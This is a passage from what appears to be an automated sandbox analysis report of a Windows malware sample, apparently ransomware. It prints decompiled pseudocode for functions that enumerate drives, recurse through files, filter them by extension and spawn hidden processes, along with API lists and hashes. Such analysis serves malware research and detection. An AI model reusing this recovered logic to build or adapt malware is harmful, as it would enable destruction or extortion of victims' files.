				asm("adc edx, eax");
				return E0F695670(_v960 + _v956 + _v964, _v932, _t115 + _t95 + _t89, _t106);
			}

0x0f693ff6
0x0f694008
0x0f69400c
0x0f694010
0x0f69401b
0x0f69401e
0x0f694020
0x0f694023
0x0f694028
0x0f69402c
0x0f694031
0x0f69403b
0x0f69403f
0x0f694046
0x0f694050
0x0f694054
0x0f69405a
0x0f694063
0x0f694072
0x0f694075
0x0f694082
0x0f694085
0x0f69408b
0x0f694092
0x0f69409f
0x0f6940a3
0x0f6940a4
0x0f6940a4
0x0f6940a7
0x0f6940a8
0x0f6940b6
0x0f6940ba
0x0f6940bd
0x0f6940c7
0x0f6940cf
0x0f6940d5
0x0f6940db
0x0f6940e1
0x0f6940eb
0x0f6940f2
0x0f6940f6
0x0f6940fa
0x0f6940fc
0x0f694104
0x0f69410d
0x0f69416c
0x0f694170
0x0f69410f
0x0f69410f
0x0f694112
0x0f694118
0x0f69411f
0x0f694120
0x0f694127
0x0f69412b
0x0f694130
0x0f694137
0x0f69413a
0x0f69413e
0x0f694148
0x0f69414a
0x0f69414e
0x0f694151
0x0f694154
0x0f694154
0x0f694154
0x0f69415a
0x0f69415e
0x0f694162
0x0f694166
0x0f694166
0x0f694176
0x0f69419a
0x0f694178
0x0f694178
0x0f694182
0x0f694186
0x0f69418d
0x0f6941a4
0x0f6941a8
0x0f6941c6

APIs

VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004), ref: 0F694010
GetTickCount.KERNEL32 ref: 0F694035
GetDriveTypeW.KERNEL32(?), ref: 0F69405A
CreateThread.KERNEL32 ref: 0F694099
WaitForMultipleObjects.KERNEL32(00000000,?), ref: 0F6940DB
GetTickCount.KERNEL32 ref: 0F6940E1

Strings

?:\, xrefs: 0F694023

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: CountTick$AllocCreateDriveMultipleObjectsThreadTypeVirtualWait
String ID: ?:\
API String ID: 458387131-2533537817
Opcode ID: 7927356688b694c364989ed120adebc9446527ba00fd89676a3e1f6abd00f2a0
Instruction ID: 34c4a793cc2e4610294af42e045e2d63933f0456c0478bad0abf118ba0edb61b
Opcode Fuzzy Hash: 7927356688b694c364989ed120adebc9446527ba00fd89676a3e1f6abd00f2a0
Instruction Fuzzy Hash: 705155705083009FC310CF18D888B5BBBE9FF89328F509A1DF9899B391D776A945CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F696F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F696F40(void* _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				long _v8;
				intOrPtr _v12;
				void* _v16;
				struct _CRITICAL_SECTION _v40;
				WCHAR* _t12;
				void* _t22;

				_t12 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_t22 = _a4;
				wsprintfW(_t12, L"%c:\\",  *_t22 & 0x0000ffff);
				InitializeCriticalSection( &_v40);
				_v12 = 0x2710;
				_v8 = 0;
				_v4 = 0xffffffff;
				_v0 = 0xffffffff;
				_v16 = VirtualAlloc(0, 0x9c40, 0x3000, 4);
				E0F696DF0(_t22 + 8, _t12,  &_v40,  *((intOrPtr*)(_t22 + 4)), _t22 + 8, _t22 + 0x10);
				VirtualFree(_t22, 0, 0x8000);
				ExitThread(0);
			}

0x0f696f59
0x0f696f5f
0x0f696f6e
0x0f696f7c
0x0f696f90
0x0f696f98
0x0f696fa0
0x0f696fa8
0x0f696fb6
0x0f696fcb
0x0f696fdb
0x0f696fe3

APIs

VirtualAlloc.KERNEL32(00000000,00000401,00003000,00000040), ref: 0F696F59
wsprintfW.USER32 ref: 0F696F6E
InitializeCriticalSection.KERNEL32(?), ref: 0F696F7C
VirtualAlloc.KERNEL32 ref: 0F696FB0

Part of subcall function 0F696DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F696E23
Part of subcall function 0F696DF0: lstrcatW.KERNEL32(00000000,0F69FF44), ref: 0F696E3B
Part of subcall function 0F696DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F696E45

VirtualFree.KERNEL32(?,00000000,00008000,00009C40,00003000,00000004), ref: 0F696FDB
ExitThread.KERNEL32 ref: 0F696FE3

Strings

%c:\, xrefs: 0F696F68

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$CriticalExitFileFindFirstFreeInitializeSectionThreadlstrcatlstrlenwsprintf
String ID: %c:\
API String ID: 1988002015-3142399695
Opcode ID: b0d67809eb8526943cbdfe3a8cc1e245ca73c6225fb42498d01cc55aa23beb7e
Instruction ID: 1133c4805e87d4d5a46b3204546f31699bcbf6c79d62c6f655624ec260dc1f09
Opcode Fuzzy Hash: b0d67809eb8526943cbdfe3a8cc1e245ca73c6225fb42498d01cc55aa23beb7e
Instruction Fuzzy Hash: 4E0192B5148300BBE7109F94DC8AF1B7BECEB44B25F004614FB659A2C1D7B99514CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0F6969B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F6969B0(WCHAR* __ecx) {
				intOrPtr _v8;
				signed int _t11;
				void* _t20;
				void* _t23;
				signed int _t26;
				signed int _t27;
				intOrPtr _t28;
				void* _t31;
				signed short* _t35;
				WCHAR* _t38;
				WCHAR* _t40;
				void* _t44;

				_push(__ecx);
				_t38 = __ecx;
				if( *0xf6a2a60 != 0) {
					_t11 = lstrlenW(__ecx);
					_t40 = _t38 + _t11 * 2 + 0xfffffffe;
					if(_t11 == 0) {
						L7:
						return 1;
					} else {
						while( *_t40 != 0x2e) {
							_t40 = _t40 - 2;
							_t11 = _t11 - 1;
							if(_t11 != 0) {
								continue;
							}
							break;
						}
						if(_t11 != 0) {
							_t23 = VirtualAlloc(0, 4 + lstrlenW(_t40) * 2, 0x3000, 4);
							wsprintfW(_t23, L"%s ", _t40);
							_t35 =  *0xf6a2a60; // 0x0
							_t28 = 0;
							_v8 = 0;
							if( *_t23 == 0) {
								L20:
								_t29 =  !=  ? 1 : _t28;
								_v8 =  !=  ? 1 : _t28;
							} else {
								_t26 =  *_t35 & 0x0000ffff;
								if(_t26 != 0) {
									_t44 = _t35 - _t23;
									do {
										_t20 = _t23;
										if(_t26 == 0) {
											L16:
											if( *_t20 == 0) {
												goto L19;
											} else {
												goto L17;
											}
										} else {
											while(1) {
												_t27 =  *_t20 & 0x0000ffff;
												if(_t27 == 0) {
													break;
												}
												_t31 = ( *(_t44 + _t20) & 0x0000ffff) - _t27;
												if(_t31 != 0) {
													goto L16;
												} else {
													_t20 = _t20 + 2;
													if( *(_t44 + _t20) != _t31) {
														continue;
													} else {
														goto L16;
													}
												}
												goto L21;
											}
											L19:
											_t28 = 0;
											goto L20;
										}
										goto L21;
										L17:
										_t26 = _t35[1] & 0x0000ffff;
										_t35 =  &(_t35[1]);
										_t44 = _t44 + 2;
									} while (_t26 != 0);
								}
							}
							L21:
							VirtualFree(_t23, 0, 0x8000);
							return _v8;
						} else {
							goto L7;
						}
					}
				} else {
					return 1;
				}
			}

0x0f6969b3
0x0f6969bc
0x0f6969be
0x0f6969d2
0x0f6969d7
0x0f6969dc
0x0f6969f0
0x0f6969fa
0x0f6969e0
0x0f6969e0
0x0f6969e6
0x0f6969e9
0x0f6969ea
0x00000000
0x00000000
0x00000000
0x0f6969ea
0x0f6969ee
0x0f696a17
0x0f696a1f
0x0f696a25
0x0f696a2b
0x0f696a30
0x0f696a36
0x0f696a82
0x0f696a89
0x0f696a8c
0x0f696a38
0x0f696a38
0x0f696a3e
0x0f696a42
0x0f696a44
0x0f696a44
0x0f696a49
0x0f696a69
0x0f696a6d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f696a4b
0x0f696a50
0x0f696a50
0x0f696a56
0x00000000
0x00000000
0x0f696a5c
0x0f696a5e
0x00000000
0x0f696a60
0x0f696a60
0x0f696a67
0x00000000
0x00000000
0x00000000
0x00000000
0x0f696a67
0x00000000
0x0f696a5e
0x0f696a80
0x0f696a80
0x00000000
0x0f696a80
0x00000000
0x0f696a6f
0x0f696a6f
0x0f696a73
0x0f696a76
0x0f696a79
0x0f696a7e
0x0f696a3e
0x0f696a8f
0x0f696a97
0x0f696aa6
0x00000000
0x00000000
0x00000000
0x0f6969ee
0x0f6969c0
0x0f6969c9
0x0f6969c9

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,?,0F696AEA), ref: 0F6969D2

Strings

%s , xrefs: 0F696A19

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: %s
API String ID: 1659193697-4273690596
Opcode ID: 95b4e24623d510da16a9a997034f25368aee9eeaae9fe6a95f0206774be77354
Instruction ID: 6884ce7e1f3d9204854a26ace8a9e6862e7d53f862a2eb778935fa90be517425
Opcode Fuzzy Hash: 95b4e24623d510da16a9a997034f25368aee9eeaae9fe6a95f0206774be77354
Instruction Fuzzy Hash: B4212332A0832597DF305B5CDC003B673ECEB80361F458226ED468B282E7BA6E5082D0

Uniqueness

Uniqueness Score: -1.00%

Function 0F694E10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
processCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F694E10(WCHAR* __ecx) {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOW _v92;
				intOrPtr _t15;
				intOrPtr _t16;
				WCHAR* _t25;

				asm("xorps xmm0, xmm0");
				_t25 = __ecx;
				asm("movdqu [ebp-0x10], xmm0");
				E0F699170( &_v92, 0, 0x44);
				_t15 =  *0xf6a2a6c; // 0x0
				_v92.hStdError = _t15;
				_v92.hStdOutput = _t15;
				_t16 =  *0xf6a2a68; // 0x0
				_v92.dwFlags = _v92.dwFlags | 0x00000101;
				_v92.hStdInput = _t16;
				_v92.wShowWindow = 0;
				_v92.cb = 0x44;
				if(CreateProcessW(0, _t25, 0, 0, 1, 0, 0, 0,  &_v92,  &_v20) != 0) {
					CloseHandle(_v20);
					return CloseHandle(_v20.hThread);
				} else {
					return GetLastError();
				}
			}

0x0f694e1c
0x0f694e22
0x0f694e24
0x0f694e29
0x0f694e2e
0x0f694e36
0x0f694e39
0x0f694e3c
0x0f694e41
0x0f694e48
0x0f694e4d
0x0f694e58
0x0f694e77
0x0f694e8d
0x0f694e98
0x0f694e79
0x0f694e83
0x0f694e83

APIs

_memset.LIBCMT ref: 0F694E29
CreateProcessW.KERNEL32 ref: 0F694E6F
GetLastError.KERNEL32(?,?,00000000), ref: 0F694E79
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F694E8D
CloseHandle.KERNEL32(?,?,?,00000000), ref: 0F694E92

Strings

D, xrefs: 0F694E58

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: D
API String ID: 1393943095-2746444292
Opcode ID: 1f30dfb27e441f4cdffa5be10ddde517958e09eeca3253c601fb4bb444eeb231
Instruction ID: 935d41d562a70329ade71d028586d3daaefe74a9e843ff6b67aa39b12cfc919c
Opcode Fuzzy Hash: 1f30dfb27e441f4cdffa5be10ddde517958e09eeca3253c601fb4bb444eeb231
Instruction Fuzzy Hash: 86012171E44318ABDB20DFE8DC45BDE7BBCEF04715F104216F608B6280E7B525548B98

Uniqueness

Uniqueness Score: -1.00%

Function 0F696E69 Relevance: 9.0, APIs: 6, Instructions: 48
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0F696E69() {
				intOrPtr* _t34;
				intOrPtr* _t38;
				void* _t40;
				WCHAR* _t46;
				void* _t51;

				do {
					if(lstrcmpW(_t51 - 0x238, ".") != 0 && lstrcmpW(_t51 - 0x238, L"..") != 0) {
						lstrcatW(_t46, _t51 - 0x238);
						if(( *(_t51 - 0x264) & 0x00000010) == 0) {
							 *((intOrPtr*)(_t51 - 0xc)) =  *_t38;
							 *_t38 =  *_t38 + E0F696AB0(_t46, _t51 - 0x264, __eflags, _t40,  *((intOrPtr*)(_t51 + 8)));
							asm("adc [ebx+0x4], edx");
							__eflags =  *((intOrPtr*)(_t38 + 4)) -  *((intOrPtr*)(_t38 + 4));
							if(__eflags <= 0) {
								if(__eflags < 0) {
									L8:
									_t34 =  *((intOrPtr*)(_t51 + 0xc));
									 *_t34 =  *_t34 + 1;
									__eflags =  *_t34;
								} else {
									__eflags =  *((intOrPtr*)(_t51 - 0xc)) -  *_t38;
									if(__eflags < 0) {
										goto L8;
									}
								}
							}
						} else {
							E0F696DF0(lstrcatW(_t46, "\\"), _t46,  *((intOrPtr*)(_t51 - 0x14)),  *((intOrPtr*)(_t51 + 8)),  *((intOrPtr*)(_t51 + 0xc)), _t38);
						}
						 *((short*)( *((intOrPtr*)(_t51 - 0x10)))) = 0;
					}
				} while (FindNextFileW( *(_t51 - 8), _t51 - 0x264) != 0);
				FindClose( *(_t51 - 8));
				return 0;
			}

0x0f696e70
0x0f696e84
0x0f696ea8
0x0f696eb1
0x0f696ee2
0x0f696eed
0x0f696eef
0x0f696ef2
0x0f696ef5
0x0f696ef7
0x0f696f00
0x0f696f00
0x0f696f03
0x0f696f03
0x0f696ef9
0x0f696efc
0x0f696efe
0x00000000
0x00000000
0x0f696efe
0x0f696ef7
0x0f696eb3
0x0f696ec7
0x0f696ecc
0x0f696f10
0x0f696f10
0x0f696f23
0x0f696f2e
0x0f696f3c

APIs

lstrcmpW.KERNEL32(?,0F69FF48,?,?), ref: 0F696E7C
lstrcmpW.KERNEL32(?,0F69FF4C,?,?), ref: 0F696E96
lstrcatW.KERNEL32(00000000,?), ref: 0F696EA8
lstrcatW.KERNEL32(00000000,0F69FF7C), ref: 0F696EB9

Part of subcall function 0F696DF0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F696E23
Part of subcall function 0F696DF0: lstrcatW.KERNEL32(00000000,0F69FF44), ref: 0F696E3B
Part of subcall function 0F696DF0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F696E45

FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0F696F1D
FindClose.KERNEL32(00003000,?,?), ref: 0F696F2E

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: Findlstrcat$Filelstrcmp$CloseFirstNextlstrlen
String ID:
API String ID: 2032009209-0
Opcode ID: 261ec93a9d1a9f408cc6b0521d5e29c03cb3760c1b70623e8f1b267b49f0b469
Instruction ID: 8e0a2b4481630a25549790f713dcabe34bcec4089212ab56f4530cbd599993fa
Opcode Fuzzy Hash: 261ec93a9d1a9f408cc6b0521d5e29c03cb3760c1b70623e8f1b267b49f0b469
Instruction Fuzzy Hash: 52018C31A0830DAACF21AFA0DC48BEEBBBDEF44244F0040A6F809D2111DB369A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0F6933E0 Relevance: 7.6, APIs: 5, Instructions: 101
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F6933E0(int* __ecx, void* __eflags, CHAR* _a4) {
				int* _v8;
				void* _t8;
				char _t10;
				void* _t14;
				void* _t15;
				char _t18;
				char _t19;
				int _t20;
				CHAR* _t23;
				CHAR* _t26;
				CHAR* _t35;
				CHAR* _t40;

				_push(__ecx);
				_t26 = _a4;
				_t37 = __ecx;
				_v8 = __ecx;
				__ecx[3] = _t26;
				_t8 = E0F6932B0(__ecx);
				if(_t8 == 0 || _t8 == 0xffffffff) {
					ExitProcess(0);
				}
				if(E0F693320(__ecx) == 0) {
					 *__ecx = 0;
					_t10 =  *_t26;
					if(_t10 == 0) {
						goto L4;
					} else {
						do {
							if(_t10 == 0x7b) {
								_t26 =  &(_t26[1]);
								_t14 = E0F693190(_t26);
								if(_t14 != 0) {
									_t15 = _t14 - 1;
									if(_t15 == 0) {
										E0F693200(_t37, _t26, 1);
									} else {
										if(_t15 == 1) {
											_t18 =  *_t26;
											_t35 = _t26;
											if(_t18 == 0) {
												L15:
												_t19 =  *_t35;
												if(_t19 != 0x7d) {
													_t40 = _t35;
													if(_t19 != 0) {
														while( *_t40 != 0x7d) {
															_t40 =  &(_t40[1]);
															if( *_t40 != 0) {
																continue;
															} else {
															}
															goto L21;
														}
														 *_t40 = 0;
													}
													L21:
													_t20 = lstrlenA(_t35);
													_t23 = HeapAlloc(GetProcessHeap(), 8, _t20 + 1);
													 *(_v8 + 8) = _t23;
													if(_t23 != 0) {
														lstrcpyA(_t23, _t35);
													}
													 *_t40 = 0x7d;
													_t37 = _v8;
												}
											} else {
												while(_t18 != 0x7d) {
													_t35 =  &(_t35[1]);
													if(_t18 == 0x3d) {
														goto L15;
													} else {
														_t18 =  *_t35;
														if(_t18 != 0) {
															continue;
														} else {
															goto L15;
														}
													}
													goto L25;
												}
											}
										}
									}
								}
							}
							L25:
							_t7 =  &(_t26[1]); // 0x97850fe0
							_t10 =  *_t7;
							_t26 =  &(_t26[1]);
						} while (_t10 != 0);
						return 1;
					}
				} else {
					 *__ecx = 1;
					L4:
					return 1;
				}
			}

0x0f6933e3
0x0f6933e5
0x0f6933e9
0x0f6933eb
0x0f6933ee
0x0f6933f1
0x0f6933f8
0x0f6934db
0x0f6934db
0x0f693410
0x0f693425
0x0f69342b
0x0f69342f
0x00000000
0x0f693431
0x0f693432
0x0f693434
0x0f69343a
0x0f693441
0x0f693444
0x0f69344a
0x0f69344b
0x0f6934ba
0x0f69344d
0x0f69344e
0x0f693450
0x0f693452
0x0f693456
0x0f693467
0x0f693467
0x0f69346b
0x0f69346d
0x0f693471
0x0f693473
0x0f693478
0x0f69347c
0x00000000
0x00000000
0x0f69347e
0x00000000
0x0f69347c
0x0f693480
0x0f693480
0x0f693483
0x0f693484
0x0f693495
0x0f69349e
0x0f6934a3
0x0f6934a7
0x0f6934a7
0x0f6934ad
0x0f6934b0
0x0f6934b0
0x00000000
0x0f693458
0x0f69345c
0x0f69345f
0x00000000
0x0f693461
0x0f693461
0x0f693465
0x00000000
0x00000000
0x00000000
0x00000000
0x0f693465
0x00000000
0x0f69345f
0x0f693458
0x0f693456
0x0f69344e
0x0f69344b
0x0f693444
0x0f6934bf
0x0f6934bf
0x0f6934bf
0x0f6934c2
0x0f6934c3
0x0f6934d6
0x0f6934d6
0x0f693412
0x0f693412
0x0f693418
0x0f693422
0x0f693422

APIs

Part of subcall function 0F6932B0: lstrlenA.KERNEL32(?,00000000,?,0F695444,?,?,0F6933F6,00000000,00000000,?,?,0F695444,00000000), ref: 0F6932C5
Part of subcall function 0F6932B0: lstrlenA.KERNEL32(?,?,0F6933F6,00000000,00000000,?,?,0F695444,00000000,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F6932EE

lstrlenA.KERNEL32(0F695445,0F695445,00000000,00000000,00000000,?,?,0F695444,00000000,?,?,?,?,0F695615,00000000,popkadurak), ref: 0F693484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F695444,00000000,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F69348E
HeapAlloc.KERNEL32(00000000,?,0F695444,00000000,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F693495
lstrcpyA.KERNEL32(00000000,0F695445,?,0F695444,00000000,?,?,?,?,0F695615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F6934A7
ExitProcess.KERNEL32 ref: 0F6934DB

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 5133cad51ee7b6d04fd1d719d97a68e1e7ffcd36778b6f9c132ecc9a140b8e87
Instruction ID: 816153ae06e2184515a8bca2d9b75e8e929f7ef11fd710dae700e15184dd8c28
Opcode Fuzzy Hash: 5133cad51ee7b6d04fd1d719d97a68e1e7ffcd36778b6f9c132ecc9a140b8e87
Instruction Fuzzy Hash: 8331483050C2455ADF230F6894467F97BADDB02B10F99418DE8D5CF383DA3E684787A1

Uniqueness

Uniqueness Score: -1.00%

Function 0F693CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F693D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F693D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F693D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F693D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F693D95

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: 666ea9f1e2bef3799e41e0db407c3a16551fc097c15948f22a81a0fb7e9a7d77
Instruction ID: c864b4d5fe04c4346660d9f7c9ad27f549fd2124b102c92b6d7d001e5075b5c8
Opcode Fuzzy Hash: 666ea9f1e2bef3799e41e0db407c3a16551fc097c15948f22a81a0fb7e9a7d77
Instruction Fuzzy Hash: 2F111BB0D4431C6EEB609F64DC0ABEA7ABCEB08714F008199A608E61C1D6B94B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F694EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F694EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf69faac]");
				_t16 =  *0xf69fab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0f694ea6
0x0f694eae
0x0f694eb4
0x0f694eb9
0x0f694ebc
0x0f694ec1
0x0f694ec6
0x0f694ec9
0x0f694f1a
0x0f694f1c
0x00000000
0x0f694f1e
0x0f694f22
0x0f694f5f
0x0f694f61
0x00000000
0x0f694f63
0x0f694f6d
0x0f694f70
0x0f694f70
0x0f694f74
0x00000000
0x00000000
0x0f694f7a
0x0f694f7a
0x0f694f7d
0x0f694f80
0x0f694f80
0x0f694f84
0x00000000
0x00000000
0x0f694f8e
0x0f694f8e
0x00000000
0x0f694f8a
0x0f694f8c
0x00000000
0x00000000
0x0f694f95
0x0f694fa4
0x00000000
0x0f694fa4
0x0f694f80
0x0f694f24
0x0f694f24
0x0f694f28
0x0f694f2f
0x0f694f31
0x0f694f31
0x0f694f36
0x0f694f4f
0x0f694f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0f694f38
0x0f694f38
0x0f694f38
0x0f694f3c
0x00000000
0x00000000
0x0f694f45
0x0f694f47
0x00000000
0x0f694f49
0x0f694f49
0x0f694f4d
0x00000000
